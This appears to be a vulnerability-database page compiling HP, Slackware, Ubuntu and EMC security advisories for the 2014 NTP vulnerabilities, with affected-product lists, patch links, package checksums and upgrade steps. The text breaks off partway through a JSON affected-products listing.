5800 (Comware 7) R7006P12 JC099A HP 5800-24G-PoE Switch, JC099B HP 5800-24G-PoE+ Switch, JC100A HP 5800-24G Switch, JC100B HP 5800-24G Switch, JC101A HP 5800-48G Switch with 2 Slots, JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots, JC103A HP 5800-24G-SFP Switch, JC103B HP 5800-24G-SFP Switch with 1 Interface Slot, JC104A HP 5800-48G-PoE Switch, JC104B HP 5800-48G-PoE+ Switch with 1 Interface Slot, JC105A HP 5800-48G Switch, JC105B HP 5800-48G Switch with 1 Interface Slot, JG254A HP 5800-24G-PoE+ TAA-compliant Switch, JG254B HP 5800-24G-PoE+ TAA-compliant Switch, JG255A HP 5800-24G TAA-compliant Switch, JG255B HP 5800-24G TAA-compliant Switch, JG256A HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot, JG256B HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot, JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot, JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot, JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot, JG258B HP 5800-48G TAA-compliant Switch with 1 Interface Slot, JG225A HP 5800AF-48G Switch, JG225B HP 5800AF-48G Switch, JG242A HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface Slots, JG242B HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface Slots, JG243A HP 5820-24XG-SFP+ TAA-compliant Switch, JG243B HP 5820-24XG-SFP+ TAA-compliant Switch, JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots & 1 OAA Slot, JG259B HP 5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots and 1 OAA Slot, JC106A HP 5820-14XG-SFP+ Switch with 2 Slots, JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots & 1 OAA Slot, JG219A HP 5820AF-24XG Switch, JG219B HP 5820AF-24XG Switch, JC102A HP 5820-24XG-SFP+ Switch, JC102B HP 5820-24XG-SFP+ Switch
CVE-2014-9295
VSR (Comware 7) R0204P01 JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software, JG811AAE HP VSR1001 Comware 7 Virtual Services Router, JG812AAE HP VSR1004 Comware 7 Virtual Services Router, JG813AAE HP VSR1008 Comware 7 Virtual Services Router
CVE-2014-9295
7900 (Comware 7) R2122 JG682A HP FlexFabric 7904 Switch Chassis, JG841A HP FlexFabric 7910 Switch Chassis, JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit, JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit
CVE-2014-9295
5130 (Comware 7) R3108P03 JG932A HP 5130-24G-4SFP+ EI Switch, JG933A HP 5130-24G-SFP-4SFP+ EI Switch, JG934A HP 5130-48G-4SFP+ EI Switch, JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch, JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch, JG975A HP 5130-24G-4SFP+ EI Brazil Switch, JG976A HP 5130-48G-4SFP+ EI Brazil Switch, JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch, JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch
CVE-2014-9295
5700 (Comware 7) R2311P06 JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch, JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch, JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch, JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch, JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch, JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch
CVE-2014-9295
VCX 9.8.17 J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr, J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr, JC517A HP VCX V7205 Platform w/DL 360 G6 Server, JE355A HP VCX V6000 Branch Platform 9.0, JC516A HP VCX V7005 Platform w/DL 120 G6 Server, JC518A HP VCX Connect 200 Primry 120 G6 Server, J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr, JE341A HP VCX Connect 100 Secondary, JE252A HP VCX Connect Primary MIM Module, JE253A HP VCX Connect Secondary MIM Module, JE254A HP VCX Branch MIM Module, JE355A HP VCX V6000 Branch Platform 9.0, JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod, JD023A HP MSR30-40 Router with VCX MIM Module, JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM, JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod, JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod, JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod, JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS, JE340A HP VCX Connect 100 Pri Server 9.0, JE342A HP VCX Connect 100 Sec Server 9.0
CVE -2014-9293 CVE-2014-9294 CVE-2014-9295
HISTORY Version:1 (rev.1) - 9 December 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
The two patches are available from the HP Support Center (HPSC). http://h20565.www2.hp.com/portal/site/hpsc?
A new B.11.31 depot for HP-UX-NTP_C.4.2.6.5.0 is available here:
https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber =HPUX-NTP
The B.11.31 image HP-UX-NTP_C.4.2.6.5.0 The B.11.23 patch PHNE_44236 for NTP v3.5 The B.11.11 patch PHNE_44235 for NTP v3.5
Mitigation steps for HP-UX B.11.23 and HP-UX B.11.11 for CVE-2014-9295
Restrict query for server status (Time Service is not affected) from ntpq/ntpdc by enabling noquery using the restrict command in /etc/ntp.conf file.
Reference: http://support.ntp.org/bin/view/Main/SecurityNotice
MANUAL ACTIONS: Yes - Update
If patch installation on B.11.11 or B.11.23 is not possible, mitigate with step above.
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
InternetSrvcs.INETSVCS-BOOT action: install PHNE_44235 or subsequent
HP-UX B.11.23
InternetSrvcs.INETSVCS2-BOOT
action: install PHNE_44236 or subsequent
HP-UX B.11.31
NTP.INETSVCS2-BOOT NTP.NTP-AUX NTP.NTP-RUN action: install revision C.4.2.6.5.0 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) - 18 February 2015 Initial release Version:2 (rev.2) - 8 April 2015 Added B.11.23 and B.11.11 patches
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.8-i486-1_slack14.1.txz: Upgraded. In addition to bug fixes and enhancements, this release fixes several high-severity vulnerabilities discovered by Neel Mehta and Stephen Roettger of the Google Security Team. For more information, see: https://www.kb.cert.org/vuls/id/852879 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9293 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9294 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9296 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8-i486-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 package: 18d7f09e90cf2434f59d7e9f11478fba ntp-4.2.8-i486-1_slack13.0.txz
Slackware x86_64 13.0 package: edd178e3d2636433dd18f52331af17a5 ntp-4.2.8-x86_64-1_slack13.0.txz
Slackware 13.1 package: 4b6da6fa564b1fe00920d402ff97bd43 ntp-4.2.8-i486-1_slack13.1.txz
Slackware x86_64 13.1 package: 292ae7dbd3ea593c5e28cbba7c2b71fa ntp-4.2.8-x86_64-1_slack13.1.txz
Slackware 13.37 package: 294b8197d360f9a3cf8186619b60b73c ntp-4.2.8-i486-1_slack13.37.txz
Slackware x86_64 13.37 package: 7cd5b63f8371b1cc369bc56e4b4efd5a ntp-4.2.8-x86_64-1_slack13.37.txz
Slackware 14.0 package: 32eab67538c33e4669bda9200799a497 ntp-4.2.8-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: 33ecf4845fa8533a12a98879815bde08 ntp-4.2.8-x86_64-1_slack14.0.txz
Slackware 14.1 package: f2b45a45c846a909ae201176ce359939 ntp-4.2.8-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: 12d7ab6e2541af4d1282621d3773e7f7 ntp-4.2.8-x86_64-1_slack14.1.txz
Slackware -current package: 5b2150cee9840d8bb547098cccde879a n/ntp-4.2.8-i486-1.txz
Slackware x86_64 -current package: 9ce09c5d6a60d3e2117988e4551e4af1 n/ntp-4.2.8-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg ntp-4.2.8-i486-1_slack14.1.txz
Then, restart the NTP daemon:
sh /etc/rc.d/rc.ntpd restart
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. ============================================================================ Ubuntu Security Notice USN-2449-1 December 22, 2014
ntp vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in NTP.
Software Description: - ntp: Network Time Protocol daemon and utility programs
Details:
Neel Mehta discovered that NTP generated weak authentication keys. A remote attacker could possibly use this issue to brute force the authentication key and send requests if permitted by IP restrictions. (CVE-2014-9294)
Stephen Roettger discovered that NTP contained buffer overflows in the crypto_recv(), ctl_putdata() and configure() functions. The default compiler options for affected releases should reduce the vulnerability to a denial of service. In addition, attackers would be isolated by the NTP AppArmor profile. (CVE-2014-9295)
Stephen Roettger discovered that NTP incorrectly continued processing when handling certain errors. (CVE-2014-9296)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.10: ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.10.1
Ubuntu 14.04 LTS: ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.1
Ubuntu 12.04 LTS: ntp 1:4.2.6.p3+dfsg-1ubuntu3.2
Ubuntu 10.04 LTS: ntp 1:4.2.4p8+dfsg-1ubuntu2.2
After a standard system update you need to regenerate any MD5 keys that were manually created with ntp-keygen.
References: http://www.ubuntu.com/usn/usn-2449-1 CVE-2014-9293, CVE-2014-9294, CVE-2014-9295, CVE-2014-9296
Package Information: https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.10.1 https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.1 https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p3+dfsg-1ubuntu3.2 https://launchpad.net/ubuntu/+source/ntp/1:4.2.4p8+dfsg-1ubuntu2.2 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04582466
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04582466 Version: 1
HPSBGN03277 rev.1 - HP Virtualization Performance Viewer, Remote Execution of Code, Denial of Service (DoS) and
Other Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2015-03-06 Last Updated: 2015-03-06
Potential Security Impact: Remote execution of code, Denial of Service (DoS), and other vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with the NTP service that is present on HP
Virtualization Performance Viewer (vPV). These could be exploited remotely to execute code, create a Denial of
Service (DoS), and other vulnerabilities.
References:
CVE-2014-9293 - Insufficient Entropy in Pseudo-Random Number Generator (PRNG) (CWE-332) CVE-2014-9294 - Use of Cryptographically Weak PRNG (CWE-338) CVE-2014-9295 - Stack Buffer Overflow (CWE-121) CVE-2014-9296 - Error Conditions, Return Values, Status Codes (CWE-389) SSRT101957
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Virtualization Performance Viewer v2.10, v2.01, v2.0, v1.X
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2014-9293 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9294 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9295 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9296 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following information to mitigate the impact of these vulnerabilities.
https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetsea rch/document/KM01411809?/
HISTORY Version:1 (rev.1) - 6 March 2015 Initial release
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-
alert@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP,
especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-alert@hp.com Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG &jumpid=in_SC-
GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do
- The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th
characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW
MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS
PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux
TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is
continually reviewing and enhancing the security features of software products to provide customers with current
secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected
HP products the important security information contained in this Bulletin. HP recommends that all users
determine the applicability of this information to their individual situations and take appropriate action. HP
does not warrant that this information is necessarily accurate or complete for all user situations and,
consequently, HP will not be responsible for any damages resulting from user's use or disregard of the
information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either
express or implied, including the warranties of merchantability and fitness for a particular purpose, title and
non-infringement."
Copyright 2015 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The
information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential
damages including downtime cost; lost profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The information in this document is subject to
change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are
trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names
mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (GNU/Linux)
iEYEARECAAYFAlT6CWUACgkQ4B86/C0qfVk6XQCg6QDwe+ba3WDTOzIDQg4Pxs9V 3ZMAn3DdFKuMO7w/MMmSc+DGUzK+zvUh =JNjz -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities
EMC Identifier: ESA-2015-004
CVE Identifier: CVE-2015-0513, CVE-2015-0514, CVE-2015-0515, CVE-2015-0516, CVE-2014-4288, CVE-2014-6456, CVE-2014-6457, CVE-2014-6458, CVE-2014-6466, CVE-2014-6468, CVE-2014-6476, CVE-2014-6485, CVE-2014-6492, CVE-2014-6493, CVE-2014-6502, CVE-2014-6503, CVE-2014-6504, CVE-2014-6506, CVE-2014-6511, CVE-2014-6512, CVE-2014-6513, CVE-2014-6515, CVE-2014-6517, CVE-2014-6519, CVE-2014-6527, CVE-2014-6531, CVE-2014-6532, CVE-2014-6558, CVE-2014-6562, CVE-2014-9293, CVE-2014-9294, CVE-2014-9295, CVE-2014-9296, CVE-2014-3618
Severity Rating: CVSS v2 Base Score: View details below for individual CVSS score for each CVE
Affected products:
\x95 EMC M&R (Watch4Net) versions prior 6.5u1
\x95 EMC ViPR SRM versions prior to 3.6.1
Summary: EMC M&R (Watch4Net) is vulnerable to multiple security vulnerabilities that could be potentially exploited by malicious users to compromise the affected system. EMC ViPR SRM is built on EMC M&R platform and is also affected by these vulnerabilities.
Details: The vulnerabilities include: \x95 Multiple Oracle Java Runtime Environment (JRE) Vulnerabilities CVE Identifiers: CVE-2014-4288, CVE-2014-6456, CVE-2014-6457, CVE-2014-6458, CVE-2014-6466, CVE-2014-6468, CVE-2014-6476, CVE-2014-6485, CVE-2014-6492, CVE-2014-6493, CVE-2014-6502, CVE-2014-6503, CVE-2014-6504, CVE-2014-6506, CVE-2014-6511, CVE-2014-6512, CVE-2014-6513, CVE-2014-6515, CVE-2014-6517, CVE-2014-6519, CVE-2014-6527, CVE-2014-6531, CVE-2014-6532, CVE-2014-6558, CVE-2014-6562.
Oracle JRE contains multiple security vulnerabilities. Oracle JRE has been upgraded to 8.0u25 to address these vulnerabilities. See vendor advisory (http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html#AppendixJAVA) for more details.
CVSS v2 Base Score: Please refer to http://nvd.nist.gov/ for the individual CVSS scores for each CVE listed above.
\x95 Multiple Cross-Site Scripting Vulnerabilities
CVE Identifier: CVE-2015-0513
Several user-supplied fields in the administrative user interface may be potentially exploited by an authenticated privileged malicious user to conduct cross-site-scripting attacks on other authenticated users of the system.
CVSS v2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
\x95 Insecure Cryptographic Storage Vulnerability CVE Identifier: CVE-2015-0514 A malicious non-ViPR SRM user with access to an installation of ViPR SRM and knowledge of internal encryption methods could potentially decrypt credentials used for data center discovery. CVSS v2 Base Score: 5.7 (AV:A/AC:M/Au:N/C:C/I:N/A:N)
\x95 Unrestricted File Upload Vulnerability CVE Identifier: CVE-2015-0515 This vulnerability may potentially be exploited by an authenticated, privileged malicious user to upload arbitrary files into the file system via the web interface. CVSS v2 Base Score: 6 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
\x95 Path Traversal Vulnerability CVE Identifier: CVE-2015-0516 This vulnerability may potentially be exploited by an authenticated, privileged malicious user to download arbitrary files from the file system via the web interface by manipulating the directory structure in the URL. CVSS v2 Base Score: 6.8 (AV:N/AC:L/Au:S/C:C/I:N/A:N)
\x95 SUSE Procmail Heap Overflow Vulnerability
CVE Identifier: CVE-2014-3618
Procmail was updated to fix a heap-overflow in procmail's formail utility when processing specially-crafted email headers. This issue affects only vApp deployments of the affected software.
CVSS v2 Base Score: Please refer to http://nvd.nist.gov/ for the CVSS score.
\x95 NTP Multiple Vulnerabilities
CVE Identifier: CVE-2014-9293 CVE-2014-9294 CVE-2014-9295 CVE-2014-9296
NTP was updated to fix multiple vulnerabilities. See vendor advisory http://support.ntp.org/bin/view/Main/SecurityNotice for more details. These issues affect only vApp deployments of the affected software.
CVSS v2 Base Score: Please refer to http://nvd.nist.gov/ for the CVSS scores.
Resolution: The following version contains the resolution to these issues: \x95 EMC M&R (Watch4Net) 6.5u1 and later \x95 EMC ViPR SRM 3.6.1 and later
EMC strongly recommends all customers upgrade at the earliest opportunity.
Link to remedies: Registered customers can download upgraded software from support.emc.com at https://support.emc.com/downloads/34247_ViPR-SRM
Credits: EMC would like to thank Han Sahin of Securify B.V. (han.sahin@securify.nl) for reporting CVE-2015-0513 and CVE-2015-0514
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201412-0615", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "paging server", "scope": "eq", "trust": 1.2, "vendor": "cisco", "version": "0" }, { "model": "download server", "scope": "eq", "trust": 1.2, "vendor": "cisco", "version": "0" }, { "model": "ntp", "scope": "lte", "trust": 1.0, "vendor": "ntp", "version": "4.2.7" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.9, "vendor": "cisco", "version": "3000" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "apple", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "cisco", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "efficientip", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "f5", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "freebsd", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "huawei", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ntp", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "omniti", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "red hat", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "watchguard", "version": null }, { "model": "ntp", "scope": "lt", "trust": 0.8, "vendor": "ntp", "version": "4.2.7p11" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sigmablade em card (n8405-043) for firmware rev.14.02 before" }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ne single model / cluster model ver.002.08.08 previous version" }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "nv7400/nv5400/nv3400 series" }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "nv7500/nv5500/nv3500 series" }, { "model": "securebranch", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "version 3.2" }, { "model": "univerge", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "3c cmm" }, { "model": "univerge", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ip8800 series" }, { "model": "bs", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "2000 series" }, { "model": "bs", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "320 series" }, { "model": "bs", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "500 series" }, { "model": "ha8000 series", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "linux", "scope": "eq", "trust": 0.6, "vendor": "ubuntu", "version": "14.10" }, { "model": "linux lts", "scope": "eq", "trust": 0.6, "vendor": "ubuntu", "version": "14.04" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.6, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.6, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux sparc", "scope": "eq", "trust": 0.6, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.6, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux i386", "scope": "eq", "trust": 0.6, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux arm", "scope": "eq", "trust": 0.6, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux amd64", "scope": "eq", "trust": 0.6, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux enterprise server sp1 ltss", "scope": "eq", "trust": 0.6, "vendor": "suse", "version": "11" }, { "model": "linux", "scope": "eq", "trust": 0.6, "vendor": "slackware", "version": "14.1" }, { "model": "linux", "scope": "eq", "trust": 0.6, "vendor": "slackware", "version": "14.0" }, { "model": "linux", "scope": "eq", "trust": 0.6, "vendor": "slackware", "version": "13.37" }, { "model": "linux", "scope": "eq", "trust": 0.6, "vendor": "slackware", "version": "13.1" }, { "model": "linux", "scope": "eq", "trust": 0.6, "vendor": "slackware", "version": "13.0" }, { "model": "enterprise linux workstation optional", "scope": "eq", "trust": 0.6, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux workstation optional", "scope": "eq", "trust": 0.6, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.6, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.6, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux server optional", "scope": "eq", "trust": 0.6, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux server optional", "scope": "eq", "trust": 0.6, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.6, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.6, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux hpc node optional", "scope": "eq", "trust": 0.6, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.6, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop optional", "scope": "eq", "trust": 0.6, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.6, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.6, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux computenode optional", "scope": "eq", "trust": 0.6, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux computenode", "scope": "eq", "trust": 0.6, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux client optional", "scope": "eq", "trust": 0.6, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux client", "scope": "eq", "trust": 0.6, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux server", "scope": 